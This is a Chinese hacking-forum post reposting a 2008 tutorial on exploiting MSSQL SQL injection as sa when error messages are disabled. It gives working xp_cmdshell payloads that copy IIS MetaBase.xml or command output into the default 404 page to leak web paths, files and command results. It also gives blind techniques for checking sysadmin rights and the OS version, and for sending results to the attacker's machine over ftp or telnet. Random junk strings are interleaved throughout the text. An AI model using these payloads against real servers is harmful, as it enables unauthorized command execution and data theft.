中国网络渗透测试联盟

标题: 28度的冰注入技巧之(一)——404页面的妙用 [打印本页]
作者: admin    时间: 2012-9-15 14:15
标题: 28度的冰注入技巧之(一)——404页面的妙用
遇到一个sa注入点,mssql错误提示关闭无疑shi让人郁闷的事情。, W5 O# w& P! ?; d# V" J0 u: v

; B, \& e# ^5 w% I; ?+ {3 H$ q  虽然错误提示关闭也shi可能以列目录,执行命令,但shishi多少就有些不方便。阿D就可能以在错误提示关闭的情况下列目录。
$ U. d: G4 P8 x7 [) N2 v
/ ]) Y5 f1 m( L; O4 O7 n+ Y! `  这里有一个很好的方法,让你得到web目录路径,让你得到服务器上的文件,让你执行命令得到回显。
5 X( j2 f1 J0 e  ~% e( F! _1 A. ^( r# b$ {# T
  IIS,404页面的默认路径shi C:\Windows\Help\iisHelp\common\404b.htm: l3 |+ Z  n) ]

) ~+ q6 O# r. I1 n  A2 `  得到web路径exec master..xp_cmdshell ’copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm’--
4 l8 ]$ V! {$ @! M4 p! t: O  a8 T- S% O3 ]" N; W! |0 J
  ,这shi20003,如果是2000的话,exec master..xp_cmdshell ’copy C:\Winnt\system32 \inetsrv\MetaBase.xml C:\Winnts\Help\iisHelp\common\404b.htm’--,在 MetaBase.xml存着IIS的很多信息。执行上面的语句之后,你再访问一下网站一个不存在的文件或目录,显示的就shiMetaBase.xml 的内容了。8 A* r5 m& J* x) D7 z+ N6 L

* ?" ?5 \* R+ i  执行命令得到回显7 u: a  t* _6 H9 l; h7 C' J
7 Z  V6 C4 m8 v
  通过上面得到web路径的方法,你肯定很容易想到怎么得到回显了吧。 2003,exec master..xp_cmdshell ’ver >C:\Windows\Help\iisHelp\common \404b.htm’--如果是2000,exec master..xp_cmdshell ’ver >C:\Winnt\Help \iisHelp\common\404b.htm’--$ c7 I# m$ j3 E

1 b8 G  E2 M$ j$ j  得到文件也shi相同,把文件copy到404b.htm就行了! Q# `- q% Z+ K- D# g0 l  b% \6 B

  C+ |4 G) ~# p  by 28ice, 2008/6/26) L- X& V# _  r8 Q  a

7 h2 g- }" G  W4 |) Y  摘自 28度的冰
  u. V1 L& n0 w
/ H" I2 V/ A, Y' e$ \( k  盲注判断权限和操作系统版本
8 u  h& p$ h3 ?" f6 v% k1 g% I3 U  G. {8 m. ~9 K. ?5 e0 u
  首先第一个问题,如果错误提示关闭,怎么判断当前的权限shi否为sysadmin呢?
. m7 h& T, R4 o: q4 H  n4 z7 @2 w$ V( u. I0 G
  最简单的,可能以用这样的方法:
( b2 k7 H6 ?9 y8 o4 O- w' ~4 J3 I
  1=(select IS_SRVROLEMEMBER(’sysadmin’))& K' j1 W4 E1 k* L) u! r

. `' {) v; ^  f: q  当然,有些情况下,这个方法并不奏效。
4 O- A3 q: s% ]( K: i/ G
' J, m) ^- ^7 r- n& e, }- W$ a2 ?  既然shisa,我们就可能以通过执行命令判断,不过,既然错误提示关闭,那么执行的结果就很不容易拿到。
/ N3 Z7 o5 u# W2 V
% C& Y5 F, l) z8 I  有个3办法可能以解决这个问题
7 K8 ~, {6 ^7 y0 A; ?/ t9 i6 |; U: }3 v' `% Q
  a.把执行结果写到404b.htm,具体请看我的上一篇文章& P( x, v" k9 S

# M, b  c# T- ^1 T0 [  b.执行ping 127.1 -n 10,看看页面shi否延迟10秒钟
3 B; g  M3 @& }
( ]5 k8 R% [# W) r. F; S  c.如果1433端口可能以连接,那干脆新建个sql登录
# _: {& d3 `8 H5 |$ f5 U2 t4 d; b5 R+ D7 B
  d.如果大牛你shi公网Ip,openrowset,或者直接telnet,ftp到你自己的机子,说到这里,ftp还有别的用处,比如,把执行结果写到文件中,然后通过ftp传到你的机子上,这何尝不shi获得执行结果的一个好办法。当然,你可能能要用到ftp的-s参数) U: [; G$ y7 {" ^9 J8 s, }9 P

/ T2 T5 v! R- k( r' U0 Q  还有一个问题,怎么判断系统shi2000还shi2003?当然指的shi错误提示关闭的情况下
- k$ O, K# |, l
( @$ r: i. M1 n" H+ _  很简单2 y: L1 P! Y* f4 _
* S; U6 R3 Q4 w
  执行systeminfo6 x% o- P+ E. i: _

8 c2 ~+ [4 x3 }& J! i# P  在xp/2003下才有这个命令,这个命令执行大概需要5秒钟时间。如果页面延迟5秒,就可能以进一步断定这shi2003(当然不排除2008的可能能性)。



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2